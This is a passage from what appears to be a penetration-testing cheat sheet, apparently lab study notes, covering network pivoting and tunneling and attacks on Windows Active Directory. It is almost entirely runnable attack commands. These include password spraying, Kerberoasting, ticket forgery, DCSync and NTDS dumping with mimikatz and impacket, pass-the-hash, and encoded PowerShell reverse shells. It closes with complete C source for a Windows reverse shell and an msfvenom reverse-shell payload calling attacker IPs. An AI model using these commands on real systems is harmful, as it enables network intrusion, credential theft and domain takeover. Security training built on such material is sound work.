ssh -N -R 127.0.0.1:2345:[target]:5432 kali@192.168.118.4
# kali can now connect to 127.0.0.1:2345

SSH Remote Dynamic (SOCKS from target)

Requires OpenSSH client ≥ 7.6 on target:

# Target:
ssh -N -R 9998 kali@192.168.118.4
# kali /etc/proxychains4.conf: "socks5 127.0.0.1 9998"
proxychains nmap -vvv -sT --top-ports=20 -Pn -n 10.4.50.64

sshuttle

socat tcp-l:2222,fork TCP:[host2]:22   # forward SSH port first
sshuttle -r username@[host1]:2222 [host2]/24 [host3]/24

Windows — ssh.exe

where ssh    # C:\Windows\System32\OpenSSH\ssh.exe
ssh.exe -V   # >= 7.6 supports remote dynamic forwarding
ssh -N -R 9998 kali@[kali-ip]
# kali: "socks5 127.0.0.1 9998" in proxychains4.conf

When firewall only allows TCP/80 outbound:

find / -name plink.exe 2>/dev/null   # locate on kali
plink.exe -ssh -l kali -pw PASSWORD -R 127.0.0.1:9833:127.0.0.1:3389 [kali-ip]

kali 127.0.0.1:9833 → target 127.0.0.1:3389: connect to the target's RDP from kali via 127.0.0.1:9833.

Windows — Netsh

Requires local admin. Adds portproxy rule:

netsh interface portproxy add v4tov4 listenport=2222 listenaddress=[host1] connectport=22 connectaddress=[host2]
netsh interface portproxy show all
netsh advfirewall firewall add rule name="port_forward_ssh_2222" protocol=TCP dir=in localip=[host1] localport=2222 action=allow
# Clean up:
netsh advfirewall firewall delete rule name="port_forward_ssh_2222"
netsh interface portproxy del v4tov4 listenport=2222 listenaddress=[host1]

Tunneling Through Deep Packet Inspection

ligolo-ng

sudo apt install ligolo-ng
sudo ip tuntap add user kali mode tun ligolo
sudo ip link set ligolo up
ligolo-proxy -selfcert -laddr 0.0.0.0:443

On target:

./agent -connect [kali_ip]:443 -ignore-cert

Set up tunnel in proxy console:

session
ifconfig
# add a route for the target's internal subnet (run in a separate kali shell, not in the proxy console):
sudo ip route add 192.168.56.0/24 dev ligolo
start
# Nmap through ligolo: add --unprivileged

Port forwarding within ligolo:

ligolo listener_add --addr [host2]:80 --to [host1]:80 --tcp

chisel (HTTP tunnel)

# Kali:
chisel server --port 8080 --reverse
# Target:
chisel client [kali_ip]:8080 R:socks
# kali /etc/proxychains4.conf: "socks5 127.0.0.1 1080"

Debug output:

chisel client [kali_ip]:8080 R:socks &> /tmp/output; curl --data @/tmp/output http://[kali_ip]:8080/

DNS Tunneling with dnscat2

# DNS server:
sudo dnsmasq -C dnsmasq.conf -d
sudo tcpdump -i ens192 udp port 53
dnscat2-server feline.corp
# Target:
./dnscat feline.corp

In dnscat2 console:

windows           # list sessions
window -i 1
listen 127.0.0.1:4455 172.16.2.11:445

DNS tunnel vs direct

DNS tunneling is significantly slower than TCP-based tunnels. Use it only when HTTP/HTTPS are blocked and only DNS egress is available. ligolo-ng or chisel is strongly preferred when you have any TCP egress.

Active Directory

Manual Enumeration — Windows Tools

net user /domain
net user [username] /domain
net group /domain
net group [groupname] /domain

PowerView

powershell -ep bypass
Import-Module ./PowerView.ps1
 
Get-Domain
Get-DomainUser | select cn,pwdlastset,lastlogon
Get-DomainGroup | select cn
Get-DomainGroupMember "Sales Department"
Get-DomainComputer | select Name,operatingsystem,dnshostname
Find-LocalAdminAccess
Get-NetSession -ComputerName [ComputerName]
.\PsLoggedon.exe \\[ComputerName]
Get-DomainUser -SPN | select samaccountname,serviceprincipalname

ACE Enumeration

AD permission types:

GenericAll: full permissions on object
GenericWrite: edit certain attributes
WriteOwner: change ownership
WriteDACL: edit ACEs applied to object
AllExtendedRights: change/reset password, etc.
ForceChangePassword: force password change
Self: self-membership (add yourself to a group)

Get-ObjectAcl -Identity [username]
Convert-SidToName [SID]
"[SID1]","[SID2]" | Convert-SidToName
Get-ObjectAcl -Identity "Management Department" | ? {$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier,ActiveDirectoryRights
net group "[groupname]" [username] /add /domain

Domain Shares

Find-DomainShare
Find-DomainShare -CheckShareAccess    # only accessible ones
# Focus on SYSVOL → Policy folders
# gpp-decrypt can decrypt GPP passwords

BloodHound

# Upload SharpHound to target:
Import-Module .\SharpHound.ps1
Invoke-BloodHound -c All -OutputDirectory C:\temp -OutputPrefix results
sudo neo4j start   # → http://localhost:7474  (neo4j:bloodhound)
bloodhound         # import zip

Useful Cypher queries:

MATCH (m:Computer) RETURN m
MATCH (m:User) RETURN m
MATCH p = (c:Computer)-[:HasSession]->(m:User) RETURN p

Password Spraying

Check lockout policy first:

net accounts   # → Lockout threshold, duration, observation window
# Windows (Spray-Passwords.ps1):
.\Spray-Passwords.ps1 -Pass Nexus123! -Admin
# Kali (crackmapexec):
crackmapexec smb 192.168.50.75 -u users.txt -p 'Nexus123!' -d corp.com --continue-on-success
# Pwn3d! → use --sam to dump hashes
.\kerbrute_windows_amd64.exe passwordspray -d corp.com .\usernames.txt "Nexus123!"

AS-REP Roasting

Condition: the account has "Do not require Kerberos preauthentication" enabled

python GetNPUsers.py corp.com/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
python GetNPUsers.py corp.com/user:pass -request -format hashcat -outputfile hashes.asreproast
.\Rubeus.exe asreproast /nowrap

Hashcat mode: 18200

Kerberoasting

.\Rubeus.exe kerberoast /outfile:hashes.kerberoast
sudo impacket-GetUserSPNs -request -dc-ip 192.168.50.70 corp.com/pete
# If KRB_AP_ERR_SKEW → sync time with ntpdate/rdate

Hashcat mode: 13100

Silver Tickets

# 1. Dump creds (need admin):
privilege::debug
sekurlsa::logonpasswords
 
# 2. Get domain SID (the user's SID without its trailing RID, the last hyphenated component):
whoami /user
 
# 3. Forge ticket:
kerberos::golden /sid:S-1-5-21-... /domain:corp.com /ptt \
  /target:web04.corp.com /service:http \
  /rc4:4d28cf5252d39971419580a51484ca09 /user:jeffadmin
 
# 4. Use it:
klist
$response = iwr -UseDefaultCredentials http://web04.corp.com

DCSync

Needs Domain Admin / Enterprise Admin / Administrators membership:

# mimikatz:
lsadump::dcsync /user:corp\Administrator
lsadump::dcsync /domain:medtech.com /all
impacket-secretsdump -just-dc-user dave corp.com/jeffadmin:"BrouhahaTungPerorateBroom2023\!"@192.168.50.70

Lateral Movement in AD

WMI

wmic /node:192.168.50.73 /user:jen /password:Nexus123! process call create "calc"

PowerShell reverse shell via CIM:

$username = 'jen'; $password = 'Nexus123!'
$secureString = ConvertTo-SecureString $password -AsPlaintext -Force
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString
$Options = New-CimSessionOption -Protocol DCOM
$Session = New-Cimsession -ComputerName 192.168.50.73 -Credential $credential -SessionOption $Options
Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create `
  -Arguments @{CommandLine = 'powershell -nop -w hidden -e JABjAGwA...'}

WinRM (ports 5985/5986)

winrs -r:files04 -u:jen -p:Nexus123! "powershell -nop -w hidden -e JABjAGwA..."
 
$secureString = ConvertTo-SecureString "Nexus123!" -AsPlaintext -Force
$credential = New-Object System.Management.Automation.PSCredential 'jen', $secureString
New-PSSession -ComputerName 192.168.50.73 -Credential $credential
Enter-PSSession 1

PsExec

Conditions: user is local Admin · ADMIN$ share available · File & Printer Sharing on

./PsExec64.exe -i \\FILES04 -u corp\jen -p Nexus123! cmd

Pass the Hash

/usr/bin/impacket-wmiexec -hashes :2892D26CDF84D7A70E2EB3B9F05C425E Administrator@192.168.50.73

Overpass the Hash

NTLM hash → TGT → TGS → code execution:

sekurlsa::pth /user:jen /domain:corp.com /ntlm:369def79d8372408bf6e93364cc93075 /run:powershell
net use \\files04        # triggers TGT request
klist                    # verify TGT
.\PsExec.exe \\files04 cmd

Pass the Ticket

privilege::debug
sekurlsa::tickets /export
dir *.kirbi
kerberos::ptt [0;12bd0]-0-0-40810000-dave@cifs-web04.kirbi

DCOM

$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","192.168.50.73"))
$dcom.Document.ActiveView.ExecuteShellCommand("powershell",$null,"powershell -nop -w hidden -e JABjAGwA...","7")

AD Persistence — Golden Ticket

privilege::debug
lsadump::lsa /patch       # get krbtgt hash
kerberos::purge           # clear existing tickets
kerberos::golden /user:jen /domain:corp.com \
  /sid:S-1-5-21-... /krbtgt:1693c6cefafffc7af11ef34d1c788f47 /ptt
misc::cmd                 # launch cmd with golden ticket

AD Persistence — Shadow Copies

vshadow.exe -nw -p C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\ntds\ntds.dit c:\ntds.dit.bak
reg.exe save hklm\system c:\system.bak
# Transfer to Kali:
impacket-secretsdump -ntds ntds.dit.bak -system system.bak LOCAL

Miscellaneous

Note-taking structure during a pentest

creds.txt  /  usernames.txt  /  passwords.txt  /  computers.txt

host1/
  ├── port.nmap
  ├── hash1
  └── hash2
host2/
  ├── port.nmap
  └── hash1

WordPress

wpscan --url http://target --enumerate p --plugins-detection aggressive -o wpscan.txt
wpscan --url http://target --passwords passwords.txt
# -e at -e ap -e u  → all themes, plugins, users

Git secrets

git log
git show [commit-id]   # inspect specific commit for creds

Monitor processes (Linux)

# pspy64 — monitor without root:
./pspy64

Extract SAM / SYSTEM

# From C:\Windows.old\Windows\System32
impacket-secretsdump -sam SAM -system SYSTEM local

Generate SSH Key Pairs

ssh-keygen -t ed25519
ssh-keygen -t rsa -b 4096
# Add public key to ~/.ssh/authorized_keys on target

Compile Windows Reverse Shell (C)

#include <winsock2.h>
#include <windows.h>
#define CLIENT_IP (char*)"192.168.45.208"
#define CLIENT_PORT (int)5555
 
int main(void) {
    WSADATA wsaData;
    WSAStartup(MAKEWORD(2,2), &wsaData);
    int port = CLIENT_PORT;
    struct sockaddr_in sa;
    SOCKET sockt = WSASocketA(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
    sa.sin_family = AF_INET;
    sa.sin_port = htons(port);
    sa.sin_addr.s_addr = inet_addr(CLIENT_IP);
    connect(sockt, (struct sockaddr *)&sa, sizeof(sa));
    STARTUPINFO sinfo; memset(&sinfo, 0, sizeof(sinfo));
    sinfo.cb = sizeof(sinfo);
    sinfo.dwFlags = STARTF_USESTDHANDLES;
    sinfo.hStdInput = sinfo.hStdOutput = sinfo.hStdError = (HANDLE)sockt;
    PROCESS_INFORMATION pinfo;
    CreateProcessA(NULL,"cmd",NULL,NULL,TRUE,CREATE_NO_WINDOW,NULL,NULL,&sinfo,&pinfo);
    return 0;
}
i686-w64-mingw32-gcc-win32 -std=c99 windows.c -o rsh.exe -lws2_32

Reverse Shell DLL (x64)

msfvenom -p windows/x64/meterpreter/reverse_tcp -a x64 -f dll \
  LHOST=192.168.45.200 LPORT=443 > reverse.dll

Grant Folder Permissions

icacls "C:\Staging" /grant adrian:(OI)(CI)F /T